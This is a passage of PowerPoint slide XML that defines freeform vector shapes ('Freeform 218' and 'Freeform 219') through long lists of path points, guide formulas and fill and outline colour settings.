                    <a:lnTo>
                      <a:pt x="29" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36085" name="Freeform 218"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2501" y="2742"/>
                <a:ext cx="120" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 120"/>
                  <a:gd name="T1" fmla="*/ 43 h 88"/>
                  <a:gd name="T2" fmla="*/ 110 w 120"/>
                  <a:gd name="T3" fmla="*/ 51 h 88"/>
                  <a:gd name="T4" fmla="*/ 116 w 120"/>
                  <a:gd name="T5" fmla="*/ 56 h 88"/>
                  <a:gd name="T6" fmla="*/ 113 w 120"/>
                  <a:gd name="T7" fmla="*/ 61 h 88"/>
                  <a:gd name="T8" fmla="*/ 120 w 120"/>
                  <a:gd name="T9" fmla="*/ 67 h 88"/>
                  <a:gd name="T10" fmla="*/ 119 w 120"/>
                  <a:gd name="T11" fmla="*/ 70 h 88"/>
                  <a:gd name="T12" fmla="*/ 112 w 120"/>
                  <a:gd name="T13" fmla="*/ 68 h 88"/>
                  <a:gd name="T14" fmla="*/ 109 w 120"/>
                  <a:gd name="T15" fmla="*/ 70 h 88"/>
                  <a:gd name="T16" fmla="*/ 111 w 120"/>
                  <a:gd name="T17" fmla="*/ 75 h 88"/>
                  <a:gd name="T18" fmla="*/ 111 w 120"/>
                  <a:gd name="T19" fmla="*/ 79 h 88"/>
                  <a:gd name="T20" fmla="*/ 106 w 120"/>
                  <a:gd name="T21" fmla="*/ 83 h 88"/>
                  <a:gd name="T22" fmla="*/ 102 w 120"/>
                  <a:gd name="T23" fmla="*/ 81 h 88"/>
                  <a:gd name="T24" fmla="*/ 95 w 120"/>
                  <a:gd name="T25" fmla="*/ 88 h 88"/>
                  <a:gd name="T26" fmla="*/ 90 w 120"/>
                  <a:gd name="T27" fmla="*/ 86 h 88"/>
                  <a:gd name="T28" fmla="*/ 88 w 120"/>
                  <a:gd name="T29" fmla="*/ 82 h 88"/>
                  <a:gd name="T30" fmla="*/ 87 w 120"/>
                  <a:gd name="T31" fmla="*/ 71 h 88"/>
                  <a:gd name="T32" fmla="*/ 83 w 120"/>
                  <a:gd name="T33" fmla="*/ 67 h 88"/>
                  <a:gd name="T34" fmla="*/ 77 w 120"/>
                  <a:gd name="T35" fmla="*/ 69 h 88"/>
                  <a:gd name="T36" fmla="*/ 73 w 120"/>
                  <a:gd name="T37" fmla="*/ 73 h 88"/>
                  <a:gd name="T38" fmla="*/ 70 w 120"/>
                  <a:gd name="T39" fmla="*/ 59 h 88"/>
                  <a:gd name="T40" fmla="*/ 65 w 120"/>
                  <a:gd name="T41" fmla="*/ 49 h 88"/>
                  <a:gd name="T42" fmla="*/ 59 w 120"/>
                  <a:gd name="T43" fmla="*/ 44 h 88"/>
                  <a:gd name="T44" fmla="*/ 47 w 120"/>
                  <a:gd name="T45" fmla="*/ 45 h 88"/>
                  <a:gd name="T46" fmla="*/ 41 w 120"/>
                  <a:gd name="T47" fmla="*/ 46 h 88"/>
                  <a:gd name="T48" fmla="*/ 29 w 120"/>
                  <a:gd name="T49" fmla="*/ 61 h 88"/>
                  <a:gd name="T50" fmla="*/ 27 w 120"/>
                  <a:gd name="T51" fmla="*/ 54 h 88"/>
                  <a:gd name="T52" fmla="*/ 21 w 120"/>
                  <a:gd name="T53" fmla="*/ 44 h 88"/>
                  <a:gd name="T54" fmla="*/ 8 w 120"/>
                  <a:gd name="T55" fmla="*/ 37 h 88"/>
                  <a:gd name="T56" fmla="*/ 7 w 120"/>
                  <a:gd name="T57" fmla="*/ 32 h 88"/>
                  <a:gd name="T58" fmla="*/ 3 w 120"/>
                  <a:gd name="T59" fmla="*/ 29 h 88"/>
                  <a:gd name="T60" fmla="*/ 0 w 120"/>
                  <a:gd name="T61" fmla="*/ 28 h 88"/>
                  <a:gd name="T62" fmla="*/ 0 w 120"/>
                  <a:gd name="T63" fmla="*/ 25 h 88"/>
                  <a:gd name="T64" fmla="*/ 8 w 120"/>
                  <a:gd name="T65" fmla="*/ 17 h 88"/>
                  <a:gd name="T66" fmla="*/ 13 w 120"/>
                  <a:gd name="T67" fmla="*/ 16 h 88"/>
                  <a:gd name="T68" fmla="*/ 19 w 120"/>
                  <a:gd name="T69" fmla="*/ 14 h 88"/>
                  <a:gd name="T70" fmla="*/ 20 w 120"/>
                  <a:gd name="T71" fmla="*/ 6 h 88"/>
                  <a:gd name="T72" fmla="*/ 30 w 120"/>
                  <a:gd name="T73" fmla="*/ 0 h 88"/>
                  <a:gd name="T74" fmla="*/ 39 w 120"/>
                  <a:gd name="T75" fmla="*/ 4 h 88"/>
                  <a:gd name="T76" fmla="*/ 49 w 120"/>
                  <a:gd name="T77" fmla="*/ 4 h 88"/>
                  <a:gd name="T78" fmla="*/ 57 w 120"/>
                  <a:gd name="T79" fmla="*/ 4 h 88"/>
                  <a:gd name="T80" fmla="*/ 59 w 120"/>
                  <a:gd name="T81" fmla="*/ 5 h 88"/>
                  <a:gd name="T82" fmla="*/ 69 w 120"/>
                  <a:gd name="T83" fmla="*/ 12 h 88"/>
                  <a:gd name="T84" fmla="*/ 74 w 120"/>
                  <a:gd name="T85" fmla="*/ 8 h 88"/>
                  <a:gd name="T86" fmla="*/ 79 w 120"/>
                  <a:gd name="T87" fmla="*/ 9 h 88"/>
                  <a:gd name="T88" fmla="*/ 86 w 120"/>
                  <a:gd name="T89" fmla="*/ 8 h 88"/>
                  <a:gd name="T90" fmla="*/ 93 w 120"/>
                  <a:gd name="T91" fmla="*/ 3 h 88"/>
                  <a:gd name="T92" fmla="*/ 97 w 120"/>
                  <a:gd name="T93" fmla="*/ 5 h 88"/>
                  <a:gd name="T94" fmla="*/ 100 w 120"/>
                  <a:gd name="T95" fmla="*/ 14 h 88"/>
                  <a:gd name="T96" fmla="*/ 105 w 120"/>
                  <a:gd name="T97" fmla="*/ 20 h 88"/>
                  <a:gd name="T98" fmla="*/ 109 w 120"/>
                  <a:gd name="T99" fmla="*/ 34 h 8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20"/>
                  <a:gd name="T151" fmla="*/ 0 h 88"/>
                  <a:gd name="T152" fmla="*/ 120 w 120"/>
                  <a:gd name="T153" fmla="*/ 88 h 8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20" h="88">
                    <a:moveTo>
                      <a:pt x="113" y="40"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="40"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36086" name="Freeform 219"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2501" y="2742"/>
                <a:ext cx="120" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 120"/>
                  <a:gd name="T1" fmla="*/ 43 h 88"/>
                  <a:gd name="T2" fmla="*/ 110 w 120"/>
                  <a:gd name="T3" fmla="*/ 51 h 88"/>
                  <a:gd name="T4" fmla="*/ 116 w 120"/>
                  <a:gd name="T5" fmla="*/ 56 h 88"/>
                  <a:gd name="T6" fmla="*/ 113 w 120"/>
                  <a:gd name="T7" fmla="*/ 61 h 88"/>
                  <a:gd name="T8" fmla="*/ 120 w 120"/>
                  <a:gd name="T9" fmla="*/ 67 h 88"/>
                  <a:gd name="T10" fmla="*/ 119 w 120"/>
                  <a:gd name="T11" fmla="*/ 70 h 88"/>
                  <a:gd name="T12" fmla="*/ 112 w 120"/>
                  <a:gd name="T13" fmla="*/ 68 h 88"/>
                  <a:gd name="T14" fmla="*/ 109 w 120"/>
                  <a:gd name="T15" fmla="*/ 70 h 88"/>
                  <a:gd name="T16" fmla="*/ 111 w 120"/>
                  <a:gd name="T17" fmla="*/ 75 h 88"/>
                  <a:gd name="T18" fmla="*/ 111 w 120"/>
                  <a:gd name="T19" fmla="*/ 79 h 88"/>
                  <a:gd name="T20" fmla="*/ 106 w 120"/>
                  <a:gd name="T21" fmla="*/ 83 h 88"/>
                  <a:gd name="T22" fmla="*/ 102 w 120"/>
                  <a:gd name="T23" fmla="*/ 81 h 88"/>
                  <a:gd name="T24" fmla="*/ 95 w 120"/>
                  <a:gd name="T25" fmla="*/ 88 h 88"/>
                  <a:gd name="T26" fmla="*/ 90 w 120"/>
                  <a:gd name="T27" fmla="*/ 86 h 88"/>
                  <a:gd name="T28" fmla="*/ 88 w 120"/>
                  <a:gd name="T29" fmla="*/ 82 h 88"/>
                  <a:gd name="T30" fmla="*/ 87 w 120"/>
                  <a:gd name="T31" fmla="*/ 71 h 88"/>
                  <a:gd name="T32" fmla="*/ 83 w 120"/>
                  <a:gd name="T33" fmla="*/ 67 h 88"/>
                  <a:gd name="T34" fmla="*/ 77 w 120"/>
                  <a:gd name="T35" fmla="*/ 69 h 88"/>
                  <a:gd name="T36" fmla="*/ 73 w 120"/>
                  <a:gd name="T37" fmla="*/ 73 h 88"/>
                  <a:gd name="T38" fmla="*/ 70 w 120"/>
                  <a:gd name="T39" fmla="*/ 59 h 88"/>
                  <a:gd name="T40" fmla="*/ 65 w 120"/>
                  <a:gd name="T41" fmla="*/ 49 h 88"/>
                  <a:gd name="T42" fmla="*/ 59 w 120"/>
                  <a:gd name="T43" fmla="*/ 44 h 88"/>
                  <a:gd name="T44" fmla="*/ 47 w 120"/>
                  <a:gd name="T45" fmla="*/ 45 h 88"/>
                  <a:gd name="T46" fmla="*/ 41 w 120"/>
                  <a:gd name="T47" fmla="*/ 46 h 88"/>
                  <a:gd name="T48" fmla="*/ 29 w 120"/>
                  <a:gd name="T49" fmla="*/ 61 h 88"/>
                  <a:gd name="T50" fmla="*/ 27 w 120"/>
                  <a:gd name="T51" fmla="*/ 54 h 88"/>
                  <a:gd name="T52" fmla="*/ 21 w 120"/>
                  <a:gd name="T53" fmla="*/ 44 h 88"/>
                  <a:gd name="T54" fmla="*/ 8 w 120"/>
                  <a:gd name="T55" fmla="*/ 37 h 88"/>
                  <a:gd name="T56" fmla="*/ 7 w 120"/>
                  <a:gd name="T57" fmla="*/ 32 h 88"/>
                  <a:gd name="T58" fmla="*/ 3 w 120"/>
                  <a:gd name="T59" fmla="*/ 29 h 88"/>
                  <a:gd name="T60" fmla="*/ 0 w 120"/>
                  <a:gd name="T61" fmla="*/ 28 h 88"/>
                  <a:gd name="T62" fmla="*/ 0 w 120"/>
                  <a:gd name="T63" fmla="*/ 25 h 88"/>
                  <a:gd name="T64" fmla="*/ 8 w 120"/>
                  <a:gd name="T65" fmla="*/ 17 h 88"/>
                  <a:gd name="T66" fmla="*/ 13 w 120"/>
                  <a:gd name="T67" fmla="*/ 16 h 88"/>
                  <a:gd name="T68" fmla="*/ 19 w 120"/>
                  <a:gd name="T69" fmla="*/ 14 h 88"/>
                  <a:gd name="T70" fmla="*/ 20 w 120"/>
                  <a:gd name="T71" fmla="*/ 6 h 88"/>
                  <a:gd name="T72" fmla="*/ 30 w 120"/>
                  <a:gd name="T73" fmla="*/ 0 h 88"/>
                  <a:gd name="T74" fmla="*/ 39 w 120"/>
                  <a:gd name="T75" fmla="*/ 4 h 88"/>
                  <a:gd name="T76" fmla="*/ 49 w 120"/>
                  <a:gd name="T77" fmla="*/ 4 h 88"/>
                  <a:gd name="T78" fmla="*/ 57 w 120"/>
                  <a:gd name="T79" fmla="*/ 4 h 88"/>
                  <a:gd name="T80" fmla="*/ 59 w 120"/>
                  <a:gd name="T81" fmla="*/ 5 h 88"/>
                  <a:gd name="T82" fmla="*/ 69 w 120"/>
                  <a:gd name="T83" fmla="*/ 12 h 88"/>
                  <a:gd name="T84" fmla="*/ 74 w 120"/>
                  <a:gd name="T85" fmla="*/ 8 h 88"/>
                  <a:gd name="T86" fmla="*/ 79 w 120"/>
                  <a:gd name="T87" fmla="*/ 9 h 88"/>
                  <a:gd name="T88" fmla="*/ 86 w 120"/>
                  <a:gd name="T89" fmla="*/ 8 h 88"/>
                  <a:gd name="T90" fmla="*/ 93 w 120"/>
                  <a:gd name="T91" fmla="*/ 3 h 88"/>
                  <a:gd name="T92" fmla="*/ 97 w 120"/>
                  <a:gd name="T93" fmla="*/ 5 h 88"/>
                  <a:gd name="T94" fmla="*/ 100 w 120"/>
                  <a:gd name="T95" fmla="*/ 14 h 88"/>
                  <a:gd name="T96" fmla="*/ 105 w 120"/>
                  <a:gd name="T97" fmla="*/ 20 h 88"/>
                  <a:gd name="T98" fmla="*/ 109 w 120"/>
                  <a:gd name="T99" fmla="*/ 34 h 8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20"/>
                  <a:gd name="T151" fmla="*/ 0 h 88"/>
                  <a:gd name="T152" fmla="*/ 120 w 120"/>
                  <a:gd name="T153" fmla="*/ 88 h 8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20" h="88">
                    <a:moveTo>
                      <a:pt x="113" y="40"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="35"/>
                    </a:lnTo>
